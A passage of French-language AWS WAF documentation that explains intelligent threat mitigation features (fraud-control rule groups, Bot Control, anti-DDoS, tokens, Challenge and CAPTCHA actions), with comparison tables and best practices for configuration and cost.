Il ne correspond pas à l'étiquette suivante.

```
awswaf:managed:aws:managed-rule-set:query:badstring
```

# Atténuation intelligente des menaces dans AWS WAF
<a name="waf-managed-protections"></a>

Cette section couvre les fonctionnalités intelligentes gérées d'atténuation des menaces fournies par AWS WAF. Il s'agit de protections avancées et spécialisées que vous pouvez mettre en œuvre pour vous protéger contre les menaces telles que les robots malveillants et les tentatives de prise de contrôle de compte. 

**Note**  
Les fonctionnalités décrites ici entraînent des coûts supplémentaires, au-delà des frais d'utilisation AWS WAF de base. Pour plus d’informations, consultez [Tarification d’AWS WAF](https://aws.amazon.com/waf/pricing/).

Les conseils fournis dans cette section sont destinés aux utilisateurs qui savent généralement comment créer et gérer le AWS WAF WebACLs, les règles et les groupes de règles. Ces sujets sont abordés dans les sections précédentes de ce guide. 

**Topics**
+ [Options pour une atténuation intelligente des menaces dans AWS WAF](waf-managed-protections-comparison-table.md)
+ [Les meilleures pratiques pour l'atténuation intelligente des menaces dans AWS WAF](waf-managed-protections-best-practices.md)
+ [Utilisation de jetons pour l'atténuation AWS WAF intelligente des menaces](waf-tokens.md)
+ [AWS WAF Contrôle des fraudes : création de comptes, prévention des fraudes (ACFP)](waf-acfp.md)
+ [AWS WAF Contrôle des fraudes et prévention des prises de contrôle des comptes (ATP)](waf-atp.md)
+ [AWS WAF Contrôle des robots](waf-bot-control.md)
+ [AWS WAF Prévention du déni de service distribué (DDoS)](waf-anti-ddos.md)
+ [Intégrations d'applications clientes dans AWS WAF](waf-application-integration.md)
+ [CAPTCHAet Challenge dans AWS WAF](waf-captcha-and-challenge.md)

# Options pour une atténuation intelligente des menaces dans AWS WAF
<a name="waf-managed-protections-comparison-table"></a>

Cette section fournit une comparaison détaillée des options de mise en œuvre d'une atténuation intelligente des menaces. 

AWS WAF propose les types de protection suivants pour une atténuation intelligente des menaces.
+ **AWS WAF Contrôle des fraudes et prévention des fraudes à la création de comptes (ACFP)** : détecte et gère les tentatives de création de compte malveillantes sur la page d'inscription de votre application. Les fonctionnalités de base sont fournies par le groupe de règles géré par l'ACFP. Pour plus d’informations, consultez [AWS WAF Contrôle des fraudes : création de comptes, prévention des fraudes (ACFP)](waf-acfp.md) et [AWS WAF Groupe de règles de prévention de la fraude (ACFP) pour la création de comptes et la prévention des fraudes](aws-managed-rule-groups-acfp.md).
+ **AWS WAF Prévention du piratage de compte Fraud Control (ATP)** : détecte et gère les tentatives de piratage malveillantes sur la page de connexion de votre application. Les fonctionnalités de base sont fournies par le groupe de règles géré par ATP. Pour plus d’informations, consultez [AWS WAF Contrôle des fraudes et prévention des prises de contrôle des comptes (ATP)](waf-atp.md) et [AWS WAF Groupe de règles de prévention des prises de contrôle des fraudes (ATP)](aws-managed-rule-groups-atp.md).
+ **AWS WAF Contrôle des robots** — Identifie, étiquette et gère les robots sympathiques et malveillants. Cette fonctionnalité permet de gérer les robots courants dont les signatures sont uniques dans toutes les applications, ainsi que les robots ciblés dont les signatures sont spécifiques à une application. Les fonctionnalités de base sont fournies par le groupe de règles géré par Bot Control. Pour plus d’informations, consultez [AWS WAF Contrôle des robots](waf-bot-control.md) et [AWS WAF Groupe de règles Bot Control](aws-managed-rule-groups-bot.md).
+ **Intégration des applications clientes SDKs** : validez les sessions client et les utilisateurs finaux sur vos pages Web et acquérez AWS WAF des jetons que les clients pourront utiliser dans leurs demandes Web. Si vous utilisez ACFP, ATP ou Bot Control, implémentez l'intégration de l'application SDKs dans votre application cliente si possible, afin de tirer pleinement parti de toutes les fonctionnalités du groupe de règles. Nous recommandons d'utiliser ces groupes de règles sans intégration du SDK uniquement à titre de mesure temporaire, lorsqu'une ressource critique doit être rapidement sécurisée et qu'il n'y a pas assez de temps pour intégrer le SDK. Pour plus d'informations sur la mise en œuvre du SDKs, consultez[Intégrations d'applications clientes dans AWS WAF](waf-application-integration.md). 
+ **Challengeet actions CAPTCHA relatives aux règles** : validez les sessions des clients et les utilisateurs finaux et obtenez AWS WAF des jetons que les clients pourront utiliser dans leurs requêtes Web. Vous pouvez les implémenter partout où vous spécifiez une action de règle, dans vos règles et en tant que dérogations dans les groupes de règles que vous utilisez. Ces actions utilisent des AWS WAF JavaScript interstitiels pour interroger le client ou l'utilisateur final, et elles nécessitent des applications clientes qui les prennent en charge. JavaScript Pour de plus amples informations, veuillez consulter [CAPTCHAet Challenge dans AWS WAF](waf-captcha-and-challenge.md).

Les groupes de règles AWS Managed Rules d'atténuation intelligente des menaces ACFP, ATP et Bot Control utilisent des jetons pour une détection avancée. Pour plus d'informations sur les fonctionnalités activées par les jetons dans les groupes de règles, reportez-vous aux [Utilisation de l'intégration des applications SDKs avec ATP](waf-atp-with-tokens.md) sections[Utilisation de l'intégration d'applications SDKs avec ACFP](waf-acfp-with-tokens.md), et[Utilisation de l'intégration d'applications SDKs avec Bot Control](waf-bot-with-tokens.md). 

Vos options pour mettre en œuvre une atténuation intelligente des menaces vont de l'utilisation de base d'actions de règles pour relever des défis et imposer l'acquisition de jetons, aux fonctionnalités avancées offertes par les groupes de règles de AWS gestion des règles d'atténuation intelligente des menaces.

Les tableaux suivants fournissent des comparaisons détaillées des options pour les fonctionnalités de base et avancées. 

**Topics**
+ [Options pour les défis et l'acquisition de jetons](waf-managed-protections-comparison-table-token.md)
+ [Options pour l'atténuation intelligente des menaces, groupes de règles gérés](waf-managed-protections-comparison-table-rg.md)
+ [Options de limitation du débit dans les règles basées sur les taux et dans les règles de contrôle des bots ciblées](waf-rate-limiting-options.md)

# Options pour les défis et l'acquisition de jetons
<a name="waf-managed-protections-comparison-table-token"></a>

Cette section compare les options de gestion des défis et des jetons.

Vous pouvez proposer des défis et acquérir des jetons à l'aide de l'intégration de l' AWS WAF application SDKs ou des actions de règles Challenge etCAPTCHA. D'une manière générale, les actions relatives aux règles sont plus faciles à mettre en œuvre, mais elles entraînent des coûts supplémentaires, s'immiscent davantage sur votre expérience client et sont obligatoires. JavaScript Ils SDKs nécessitent une programmation dans vos applications clientes, mais ils peuvent offrir une meilleure expérience client, ils sont gratuits et peuvent être utilisés avec JavaScript ou dans des applications Android ou iOS. Vous ne pouvez utiliser l'intégration de l'application qu' SDKs avec des packs de protection (Web ACLs) qui utilisent l'un des groupes de règles gérés payants d'atténuation intelligente des menaces, décrits dans la section suivante. 


**Comparaison des options pour les défis et l'acquisition de jetons**  

|  | Action de règle Challenge | Action de règle CAPTCHA | JavaScript Défi du SDK | Défi du SDK mobile | 
| --- | --- | --- | --- | --- | 
| Qu'est-ce que c'est | Règle : action qui impose l'acquisition du AWS WAF jeton en présentant au client du navigateur un défi silencieux (interstitiel)  | Règle : action qui impose l'acquisition du AWS WAF jeton en présentant à l'utilisateur final un défi visuel ou audio (interstitiel)  |  Couche d'intégration des applications, pour les navigateurs clients et les autres appareils qui s'exécutentJavaScript. Lance le défi silencieux et obtient un jeton  |  Couche d'intégration des applications, pour les applications Android et iOS. Rend nativement le défi silencieux et obtient un jeton  | 
| Bon choix pour... | Validation silencieuse contre les sessions de bots et application de l'acquisition de jetons pour les clients qui prennent en charge JavaScript  | Validation silencieuse par l'utilisateur final contre les sessions de bot et application de l'acquisition de jetons, pour les clients qui prennent en charge JavaScript | Validation silencieuse contre les sessions de bots et mise en œuvre de l'acquisition de jetons pour les clients qui les prennent en charge JavaScript. Ils SDKs offrent la latence la plus faible et le meilleur contrôle sur l'endroit où le script de défi s'exécute dans l'application. | Validation silencieuse contre les sessions de bots et application de l'acquisition de jetons pour les applications mobiles natives sur Android et iOS. Ils SDKs offrent la latence la plus faible et le meilleur contrôle sur l'endroit où le script de défi s'exécute dans l'application. | 
| Considérations relatives à la | Implémenté en tant que règle, paramètre d'action | Implémenté en tant que règle, paramètre d'action | Nécessite l'un des groupes de règles payants ACFP, ATP ou Bot Control du pack de protection (ACL Web). Nécessite un codage dans l'application client. | Nécessite l'un des groupes de règles payants ACFP, ATP ou Bot Control du pack de protection (ACL Web). Nécessite un codage dans l'application client. | 
| Considérations relatives à l’exécution | Flux intrusif pour les demandes sans jetons valides. Le client est redirigé vers un interstitiel de AWS WAF challenge. Ajoute des allers-retours sur le réseau et nécessite une deuxième évaluation de la requête Web.  | Flux intrusif pour les demandes sans jetons valides. Le client est redirigé vers un AWS WAF interstitiel CAPTCHA. Ajoute des allers-retours sur le réseau et nécessite une deuxième évaluation de la requête Web.  | Peut être exécuté dans les coulisses. Vous permet de mieux contrôler l'expérience du défi.  | Peut être exécuté dans les coulisses. Vous permet de mieux contrôler l'expérience du défi.  | 
| Requiert JavaScript | Oui | Oui | Oui | Non | 
| Clients pris en charge | Navigateur et appareils qui exécutent Javascript | Navigateur et appareils qui exécutent Javascript | Navigateur et appareils qui exécutent Javascript | Appareils Android et iOS | 
| Supporte les applications d'une seule page (SPA) | Exécution uniquement. Vous pouvez utiliser cette Challenge action conjointement avec le SDKs, pour vous assurer que les demandes contiennent un jeton de défi valide. Vous ne pouvez pas utiliser l'action de règle pour envoyer le script de défi à la page.  | Exécution uniquement. Vous pouvez utiliser cette CAPTCHA action conjointement avec leSDKs, pour vous assurer que les demandes contiennent un jeton CAPTCHA valide. Vous ne pouvez pas utiliser l'action de règle pour envoyer le script CAPTCHA à la page.  | Oui | N/A | 
| Coût supplémentaire | Oui, pour les paramètres d'action que vous spécifiez explicitement, soit dans les règles que vous définissez, soit en tant que dérogation aux actions des règles dans les groupes de règles que vous utilisez. Non dans tous les autres cas.  | Oui, pour les paramètres d'action que vous spécifiez explicitement, soit dans les règles que vous définissez, soit en tant que dérogation aux actions des règles dans les groupes de règles que vous utilisez. Non dans tous les autres cas.  | Non, mais nécessite l'un des groupes de règles payants ACFP, ATP ou Bot Control. | Non, mais nécessite l'un des groupes de règles payants ACFP, ATP ou Bot Control. | 

Pour plus de détails sur les coûts associés à ces options, consultez les informations relatives à l'atténuation intelligente des menaces sur la page [AWS WAF Tarification](https://aws.amazon.com/waf/pricing/).

Il peut être plus simple de lancer des défis et d'appliquer les jetons de base en ajoutant simplement une règle avec une CAPTCHA action Challenge ou. Vous devrez peut-être utiliser les actions des règles, par exemple si vous n'avez pas accès au code de l'application. 

 SDKs Cependant, si vous pouvez l'implémenter, vous pouvez réduire les coûts et réduire le temps de latence lors de l'évaluation des demandes Web des clients dans votre pack de protection (ACL Web), par rapport à l'utilisation de l'Challengeaction suivante : 
+ Vous pouvez écrire l'implémentation de votre SDK pour exécuter le défi à n'importe quel moment de votre application. Vous pouvez acquérir le jeton en arrière-plan, avant toute action du client susceptible d'envoyer une demande Web à votre ressource protégée. De cette façon, le jeton peut être envoyé avec la première demande de votre client. 
+ Si, au contraire, vous acquérez des jetons en implémentant une règle avec l'Challengeaction, la règle et l'action nécessitent une évaluation et un traitement supplémentaires des requêtes Web lorsque le client envoie une demande pour la première fois et chaque fois que le jeton expire. L'Challengeaction bloque la demande qui ne contient pas de jeton valide et non expiré et renvoie l'interstitiel de défi au client. Une fois que le client a répondu avec succès au défi, l'interstitiel renvoie la demande Web d'origine avec le jeton valide, qui est ensuite évalué une deuxième fois par le pack de protection (ACL Web). 

# Options pour l'atténuation intelligente des menaces, groupes de règles gérés
<a name="waf-managed-protections-comparison-table-rg"></a>

Cette section compare les options des groupes de règles gérés.

Les groupes de règles AWS gérées pour l'atténuation intelligente des menaces permettent de gérer les robots de base, de détecter et d'atténuer les robots malveillants sophistiqués, de détecter et d'atténuer les tentatives de prise de contrôle de comptes, ainsi que de détecter et d'atténuer les tentatives de création de comptes frauduleuses. Ces groupes de règles, combinés à l'intégration des applications SDKs décrite dans la section précédente, fournissent les protections les plus avancées et un couplage sécurisé avec vos applications clientes. 


**Comparaison des options de groupes de règles gérées**  

|  | ACFP  | ATP  | Bot Control (niveau commun) | Niveau ciblé de Bot Control | 
| --- | --- | --- | --- | --- | 
| Qu'est-ce que c'est | Gère les demandes susceptibles de faire partie de tentatives de création de compte frauduleuses sur les pages d'inscription et d'inscription d'une application.Ne gère pas les robots. Consultez [AWS WAF Groupe de règles de prévention de la fraude (ACFP) pour la création de comptes et la prévention des fraudes](aws-managed-rule-groups-acfp.md). | Gère les demandes susceptibles de faire partie de tentatives de prise de contrôle malveillantes sur la page de connexion d'une application.Ne gère pas les robots. Consultez [AWS WAF Groupe de règles de prévention des prises de contrôle des fraudes (ATP)](aws-managed-rule-groups-atp.md). | Gère les robots courants qui s'identifient eux-mêmes, avec des signatures uniques pour toutes les applications.Consultez [AWS WAF Groupe de règles Bot Control](aws-managed-rule-groups-bot.md). | Gère les robots ciblés qui ne s'identifient pas eux-mêmes, avec des signatures spécifiques à une application.Consultez [AWS WAF Groupe de règles Bot Control](aws-managed-rule-groups-bot.md). | 
| Bon choix pour... | L'inspection du trafic de création de comptes pour détecter toute création de compte frauduleuse attaque les tentatives de création de tels comptes en passant par le nom d'utilisateur et en créant de nombreux nouveaux comptes à partir d'une seule adresse IP. | L'inspection du trafic de connexion pour détecter le piratage de compte attaque les tentatives de connexion par traversée de mots de passe et les nombreuses tentatives de connexion effectuées à partir de la même adresse IP. Lorsqu'il est utilisé avec des jetons, il fournit également des protections globales telles que la limitation du débit IPs et les sessions client en cas d'échec d'un grand nombre de tentatives de connexion. | Protection de base contre les bots et étiquetage du trafic de bots courant et automatisé. | Protection ciblée contre les robots sophistiqués, notamment en limitant le débit au niveau de la session client et en détectant et atténuant les outils d'automatisation des navigateurs tels que Selenium et Puppeteer.  | 
| Ajoute des étiquettes indiquant les résultats de l'évaluation | Oui | Oui | Oui | Oui | 
| Ajoute des étiquettes de jetons | Oui | Oui | Oui | Oui | 
| Blocage des demandes dont le jeton n'est pas valide | Non inclus Consultez [Blocage des demandes dont le AWS WAF jeton n'est pas valide](waf-tokens-block-missing-tokens.md). | Non inclus Consultez [Blocage des demandes dont le AWS WAF jeton n'est pas valide](waf-tokens-block-missing-tokens.md). | Non inclus Consultez [Blocage des demandes dont le AWS WAF jeton n'est pas valide](waf-tokens-block-missing-tokens.md). | Bloque les sessions client qui envoient 5 demandes sans jeton. | 
| Nécessite le AWS WAF jeton aws-waf-token | Obligatoire pour toutes les règles.Consultez [Utilisation de l'intégration d'applications SDKs avec ACFP](waf-acfp-with-tokens.md). | Obligatoire pour de nombreuses règles.Consultez [Utilisation de l'intégration des applications SDKs avec ATP](waf-atp-with-tokens.md). | Non | Oui | 
| Acquiert le AWS WAF jeton aws-waf-token | Oui, conformément à la règle AllRequests | Non | Non | Certaines règles utilisent Challenge ou CAPTCHA régissent des actions qui permettent d'acquérir des jetons. | 

Pour plus de détails sur les coûts associés à ces options, consultez les informations relatives à l'atténuation intelligente des menaces sur la page [AWS WAF Tarification](https://aws.amazon.com/waf/pricing/).

# Options de limitation du débit dans les règles basées sur les taux et dans les règles de contrôle des bots ciblées
<a name="waf-rate-limiting-options"></a>

Cette section compare les options d'atténuation basées sur le taux.

Le niveau ciblé du groupe de règles AWS WAF Bot Control et l'énoncé de règle AWS WAF basé sur le taux permettent tous deux de limiter le débit des requêtes Web. Le tableau suivant compare les deux options.


**Comparaison des options de détection et d'atténuation basées sur le débit**  

|  | AWS WAF règle basée sur le taux | AWS WAF Règles ciblées de Bot Control | 
| --- | --- | --- | 
| Comment la limitation de débit est appliquée | Agit sur des groupes de demandes qui arrivent à un rythme trop élevé. Vous pouvez appliquer n'importe quelle action à l'exception deAllow.  | Applique des modèles d'accès similaires à ceux des humains et applique une limitation dynamique du débit, grâce à l'utilisation de jetons de demande.  | 
| Sur la base de l'historique du trafic ? | Non  | Oui  | 
| Temps nécessaire pour accumuler les données de référence du trafic historique | N/A  | Cinq minutes pour les seuils dynamiques. N/A pour jeton absent. | 
| Retard d'atténuation | Habituellement 30 à 50 secondes. Cela peut prendre plusieurs minutes.  | Généralement moins de 10 secondes. Cela peut prendre plusieurs minutes.  | 
| Objectifs d'atténuation | Configurable. Vous pouvez regrouper les demandes à l'aide d'une instruction scope-down et d'une ou de plusieurs clés d'agrégation, telles que l'adresse IP, la méthode HTTP et la chaîne de requête. | Adresses IP et sessions client  | 
| Niveau de volume de trafic requis pour déclencher des mesures d'atténuation | Moyen : le nombre de demandes peut être inférieur à 10 dans le créneau horaire spécifié  | Faible : conçu pour détecter les modèles clients tels que les scrapers lents  | 
| Seuils personnalisables | Oui  | Non  | 
| Action d'atténuation par défaut | La valeur par défaut de la console estBlock. Aucun paramètre par défaut dans l'API ; le paramètre est obligatoire. Vous pouvez définir cette option pour n'importe quelle action de règle, à l'exception deAllow. | Les paramètres d'action des règles du groupe de règles Challenge concernent l'absence de jeton et CAPTCHA le trafic à volume élevé provenant d'une seule session client. Vous pouvez définir l'une ou l'autre de ces règles pour n'importe quelle action de règle valide.  | 
| Résilience face aux attaques hautement distribuées | Moyen : 10 000 adresses IP maximum pour limiter les adresses IP à elle seule | Moyen : limité à 50 000 au total entre les adresses IP et les jetons  | 
| [AWS WAF Tarification](https://aws.amazon.com/waf/pricing/) | Inclus dans les frais standard pour AWS WAF.  | Inclus dans les frais correspondant au niveau ciblé d'atténuation intelligente des menaces par Bot Control.  | 
| Pour plus d'informations | [Utilisation d'instructions de règles basées sur le taux dans AWS WAF](waf-rule-statement-type-rate-based.md) | [AWS WAF Groupe de règles Bot Control](aws-managed-rule-groups-bot.md) | 

# Les meilleures pratiques pour l'atténuation intelligente des menaces dans AWS WAF
<a name="waf-managed-protections-best-practices"></a>

Suivez les meilleures pratiques décrites dans cette section pour mettre en œuvre les fonctionnalités intelligentes d'atténuation des menaces de la manière la plus efficace et la plus rentable possible. 
+ **Mise en œuvre JavaScript de l'intégration des applications mobiles SDKs** : implémentez l'intégration des applications pour activer l'ensemble complet des fonctionnalités ACFP, ATP ou Bot Control de la manière la plus efficace possible. Les groupes de règles gérés utilisent les jetons fournis par le SDKs pour séparer le trafic client légitime du trafic indésirable au niveau de la session. L'intégration de l'application SDKs garantit que ces jetons sont toujours disponibles. Pour plus d'informations, consultez la: 
  + [Utilisation de l'intégration d'applications SDKs avec ACFP](waf-acfp-with-tokens.md)
  + [Utilisation de l'intégration des applications SDKs avec ATP](waf-atp-with-tokens.md)
  + [Utilisation de l'intégration d'applications SDKs avec Bot Control](waf-bot-with-tokens.md)

  Utilisez les intégrations pour mettre en œuvre les défis de votre client et pour JavaScript personnaliser la façon dont les puzzles CAPTCHA sont présentés à vos utilisateurs finaux. Pour en savoir plus, consultez [Intégrations d'applications clientes dans AWS WAF](waf-application-integration.md). 

  Si vous personnalisez des puzzles CAPTCHA à l'aide de l' JavaScript API et que vous utilisez l'action de CAPTCHA règle n'importe où dans votre pack de protection (ACL Web), suivez les instructions relatives à la gestion de la réponse AWS WAF CAPTCHA dans votre client à l'adresse. [Gestion d'une réponse CAPTCHA depuis AWS WAF](waf-js-captcha-api-conditional.md) Ces instructions s'appliquent à toutes les règles qui utilisent l'CAPTCHAaction, y compris celles du groupe de règles géré par l'ACFP et le niveau de protection ciblé du groupe de règles géré par Bot Control. 
+ **Limitez les demandes que vous envoyez aux groupes de règles ACFP, ATP et Bot Control : l'utilisation des groupes** de règles de règles de AWS gestion des règles d'atténuation intelligente des menaces entraîne des frais supplémentaires. Le groupe de règles ACFP inspecte les demandes adressées aux points de terminaison d'enregistrement et de création de comptes que vous spécifiez. Le groupe de règles ATP inspecte les demandes adressées au point de terminaison de connexion que vous spécifiez. Le groupe de règles Bot Control inspecte chaque demande qui lui parvient dans le cadre de l'évaluation du pack de protection (ACL Web). 

  Envisagez les approches suivantes pour réduire votre utilisation de ces groupes de règles : 
  + Exclure les demandes de l'inspection à l'aide d'une instruction scope-down dans l'instruction du groupe de règles géré. Vous pouvez le faire avec n'importe quel énoncé emboîtable. Pour plus d'informations, consultez [Utilisation d'instructions scope-down dans AWS WAF](waf-rule-scope-down-statements.md).
  + Exclure les demandes de l'inspection en ajoutant des règles avant le groupe de règles. Pour les règles que vous ne pouvez pas utiliser dans une instruction de portée réduite et pour les situations plus complexes, telles que l'étiquetage suivi d'une correspondance d'étiquettes, vous souhaiterez peut-être ajouter des règles qui s'exécutent avant les groupes de règles. Pour plus d’informations, consultez [Utilisation d'instructions scope-down dans AWS WAF](waf-rule-scope-down-statements.md) et [Utilisation d'instructions de règle dans AWS WAF](waf-rule-statements.md).
  + Exécutez les groupes de règles selon des règles moins coûteuses. Si d'autres AWS WAF règles standard bloquent les demandes pour quelque raison que ce soit, exécutez-les avant ces groupes de règles payants. Pour plus d'informations sur les règles et leur gestion, consultez[Utilisation d'instructions de règle dans AWS WAF](waf-rule-statements.md).
  + Si vous utilisez plusieurs groupes de règles gérés d'atténuation intelligente des menaces, exécutez-les dans l'ordre suivant pour réduire les coûts : Bot Control, ATP, ACFP.

  Pour obtenir des informations détaillées sur la tarification, veuillez consulter la section [Tarification AWS WAF](https://aws.amazon.com/waf/pricing/).
+ **Ne limitez pas les demandes que vous envoyez au groupe de règles DDo anti-S : ce groupe** de règles fonctionne mieux lorsque vous le configurez pour surveiller tout le trafic Web que vous n'autorisez pas explicitement à passer. Positionnez-le dans votre ACL Web pour qu'il soit évalué uniquement après les règles avec l'Allowaction des règles et avant toutes les autres règles. 
+ **Pour la protection par déni de service (DDoS) distribué, utilisez l'atténuation automatique de la couche d'application DDo S Anti- DDo S ou Shield Advanced**. Les autres groupes de règles d'atténuation intelligente des menaces ne fournissent pas de protection DDo S. L'ACFP protège contre les tentatives frauduleuses de création de compte sur la page d'inscription de votre application. ATP vous protège contre les tentatives d'usurpation de compte sur votre page de connexion. Bot Control se concentre sur l'application de modèles d'accès de type humain à l'aide de jetons et sur la limitation dynamique du débit lors des sessions client.

  Anti- DDo S vous permet de surveiller et de contrôler les attaques DDo S, ce qui permet de réagir rapidement et d'atténuer les menaces. Shield Advanced avec atténuation automatique de la couche d'application DDo S répond automatiquement aux attaques DDo S détectées en créant, en évaluant et en déployant des mesures d' AWS WAF atténuation personnalisées en votre nom.

  Pour plus d'informations sur Shield Advanced[Présentation de AWS Shield Advanced](ddos-advanced-summary.md), reportez-vous aux sections et[Protection de la couche applicative (couche 7) avec AWS Shield Advanced et AWS WAF](ddos-app-layer-protections.md).

  Pour plus d'informations sur la prévention du déni de service (DDoS) distribué, consultez [Groupe de règles DDo anti-S](aws-managed-rule-groups-anti-ddos.md) et[Prévention du déni de service distribué (DDoS)](waf-anti-ddos.md).
+  **Activez le groupe de règles DDo anti-S et le niveau de protection ciblé du groupe de règles Bot Control pendant le trafic Web normal**. Ces catégories de règles ont besoin de temps pour établir des bases de référence pour le trafic normal. 

   **Activez le niveau de protection ciblé du groupe de règles Bot Control pendant le trafic Web normal** : certaines règles du niveau de protection ciblé ont besoin de temps pour établir des bases de référence pour les modèles de trafic normaux avant de pouvoir reconnaître les modèles de trafic irréguliers ou malveillants et y répondre. Par exemple, les `TGT_ML_*` règles ont besoin de 24 heures pour s'échauffer. 

  Ajoutez ces protections lorsque vous n'êtes pas victime d'une attaque et donnez-leur le temps d'établir leurs bases de référence avant de s'attendre à ce qu'ils réagissent de manière appropriée. Si vous ajoutez ces règles lors d'une attaque, vous devrez activer le groupe de règles DDo anti-S en mode décompte. Une fois l'attaque terminée, le temps nécessaire pour établir une base de référence est généralement du double au triple du temps normalement requis, en raison de la distorsion ajoutée par le trafic d'attaque. Pour plus d'informations sur les règles et les temps de préchauffage qu'elles exigent, consultez[Liste des règles](aws-managed-rule-groups-bot.md#aws-managed-rule-groups-bot-rules).
+ **Pour la protection contre le déni de service (DDoS) distribué, utilisez l'atténuation automatique de la couche d'application DDo S de Shield Advanced** : les groupes de règles d'atténuation intelligente des menaces ne fournissent pas de protection DDo S. L'ACFP protège contre les tentatives frauduleuses de création de compte sur la page d'inscription de votre application. ATP vous protège contre les tentatives d'usurpation de compte sur votre page de connexion. Bot Control se concentre sur l'application de modèles d'accès de type humain à l'aide de jetons et sur la limitation dynamique du débit lors des sessions client.

  Lorsque vous utilisez Shield Advanced avec l'atténuation automatique de la couche d'application DDo S activée, Shield Advanced répond automatiquement aux attaques DDo S détectées en créant, en évaluant et en déployant des mesures d' AWS WAF atténuation personnalisées en votre nom. Pour plus d'informations sur Shield Advanced[Présentation de AWS Shield Advanced](ddos-advanced-summary.md), reportez-vous aux sections et[Protection de la couche applicative (couche 7) avec AWS Shield Advanced et AWS WAF](ddos-app-layer-protections.md).
+ **Utilisez les charges de trafic de production lorsque vous établissez des bases de référence pour le groupe de règles DDo anti-S**. Il est courant de tester d'autres groupes de règles à l'aide d'un trafic de test artificiel. Toutefois, lorsque vous testez et établissez des bases de référence pour le groupe de règles DDo anti-S, nous vous recommandons d'utiliser des flux de trafic qui reflètent les charges de votre environnement de production. L'établissement de lignes de base DDo anti-S en utilisant le trafic typique est le meilleur moyen de garantir la protection de vos ressources lorsque le groupe de règles est activé dans un environnement de production.
+ **Réglez et configurez la gestion des jetons** : ajustez la gestion des jetons du pack de protection (ACL Web) pour une expérience utilisateur optimale. 
  + Pour réduire les coûts d'exploitation et améliorer l'expérience de votre utilisateur final, réglez les durées d'immunité de gestion des jetons au maximum de vos exigences de sécurité. Cela permet de réduire au minimum l'utilisation de puzzles CAPTCHA et de défis silencieux. Pour plus d'informations, consultez [Configuration de l'expiration de l'horodatage et de la durée d'immunité des jetons dans AWS WAF](waf-tokens-immunity-times.md).
  + Pour activer le partage de jetons entre les applications protégées, configurez une liste de domaines de jetons pour votre pack de protection (ACL Web). Pour plus d'informations, consultez [Spécification de domaines de jetons et de listes de domaines dans AWS WAF](waf-tokens-domains.md).
+ **Rejeter les demandes avec des spécifications d'hôte arbitraires** : configurez vos ressources protégées pour exiger que `Host` les en-têtes des requêtes Web correspondent à la ressource ciblée. Vous pouvez accepter une valeur ou un ensemble de valeurs spécifique, par exemple `myExampleHost.com` et`www.myExampleHost.com`, mais n'acceptez pas de valeurs arbitraires pour l'hôte. 
+ **Pour les équilibreurs de charge d'application issus de CloudFront distributions, configurez CloudFront et AWS WAF gérez correctement les jetons** : si vous associez votre pack de protection (ACL Web) à un Application Load Balancer et que vous déployez l'Application Load Balancer comme origine CloudFront d'une distribution, consultez. [Configuration requise pour les équilibreurs de charge d'application qui sont des origines CloudFront](waf-tokens-with-alb-and-cf.md)
+ **Testez et ajustez avant le déploiement** : avant d'implémenter des modifications dans votre pack de protection (ACL Web), suivez les procédures de test et de réglage décrites dans ce guide pour vous assurer que vous obtenez le comportement que vous attendez. Cela est particulièrement important pour ces fonctionnalités payantes. Pour des conseils généraux, voir[Tester et ajuster vos AWS WAF protections](web-acl-testing.md). Pour obtenir des informations spécifiques aux groupes de règles gérés payants, reportez-vous aux [Tester et déployer ATP](waf-atp-deploying.md) sections[Test et déploiement de l'ACFP](waf-acfp-deploying.md), et[Tester et déployer AWS WAF Bot Control](waf-bot-control-deploying.md).

# Utilisation de jetons pour l'atténuation AWS WAF intelligente des menaces
<a name="waf-tokens"></a>

Cette section explique à quoi AWS WAF servent les jetons.

AWS WAF les jetons font partie intégrante des protections améliorées offertes par l'atténuation AWS WAF intelligente des menaces. Un jeton, parfois appelé empreinte digitale, est un ensemble d'informations relatives à une session client unique que le client stocke et fournit avec chaque requête Web qu'il envoie. AWS WAF utilise des jetons pour identifier et séparer les sessions client malveillantes des sessions légitimes, même lorsque les deux proviennent d'une seule adresse IP. L'utilisation de jetons impose des coûts négligeables pour les utilisateurs légitimes, mais élevés à grande échelle pour les botnets. 

AWS WAF utilise des jetons pour prendre en charge la fonctionnalité de défi de son navigateur et de l'utilisateur final, qui est fournie par l'intégration de l'application SDKs et par les actions de règles Challenge etCAPTCHA. En outre, les jetons activent les fonctionnalités des groupes de règles gérés pour le contrôle des AWS WAF bots et la prévention du piratage de comptes.

AWS WAF crée, met à jour et chiffre des jetons pour les clients qui répondent avec succès aux défis silencieux et aux puzzles CAPTCHA. Lorsqu'un client doté d'un jeton envoie une requête Web, celui-ci inclut le jeton crypté, le AWS WAF déchiffre et vérifie son contenu. 

**Topics**
+ [Comment AWS WAF utilise les jetons](waf-tokens-usage.md)
+ [AWS WAF caractéristiques du jeton](waf-tokens-details.md)
+ [Configuration de l'expiration de l'horodatage et de la durée d'immunité des jetons dans AWS WAF](waf-tokens-immunity-times.md)
+ [Spécification de domaines de jetons et de listes de domaines dans AWS WAF](waf-tokens-domains.md)
+ [Types d'étiquettes à jetons dans AWS WAF](waf-tokens-labeling.md)
+ [Blocage des demandes dont le AWS WAF jeton n'est pas valide](waf-tokens-block-missing-tokens.md)
+ [Configuration requise pour les équilibreurs de charge d'application qui sont des origines CloudFront](waf-tokens-with-alb-and-cf.md)

# Comment AWS WAF utilise les jetons
<a name="waf-tokens-usage"></a>

Cette section explique comment les jetons sont AWS WAF utilisés.

AWS WAF utilise des jetons pour enregistrer et vérifier les types de validation de session client suivants : 
+ **CAPTCHA** — Les puzzles CAPTCHA aident à distinguer les robots des utilisateurs humains. Un CAPTCHA est exécuté uniquement par l'action de la CAPTCHA règle. Une fois le puzzle terminé, le script CAPTCHA met à jour l'horodatage CAPTCHA du jeton. Pour de plus amples informations, veuillez consulter [CAPTCHAet Challenge dans AWS WAF](waf-captcha-and-challenge.md).
+ **Défi** — Les défis s'exécutent en silence pour aider à distinguer les sessions clients ordinaires des sessions de bot et pour rendre le fonctionnement des robots plus coûteux. Lorsque le défi est terminé avec succès, le script du défi se procure automatiquement un nouveau jeton AWS WAF si nécessaire, puis met à jour l'horodatage du défi du jeton. 

  AWS WAF lance des défis dans les situations suivantes : 
  + **Intégration des applications SDKs** : l'intégration des applications SDKs s'exécute dans les sessions de votre application cliente et permet de garantir que les tentatives de connexion ne sont autorisées qu'une fois que le client a répondu avec succès à un défi. Pour de plus amples informations, veuillez consulter [Intégrations d'applications clientes dans AWS WAF](waf-application-integration.md).
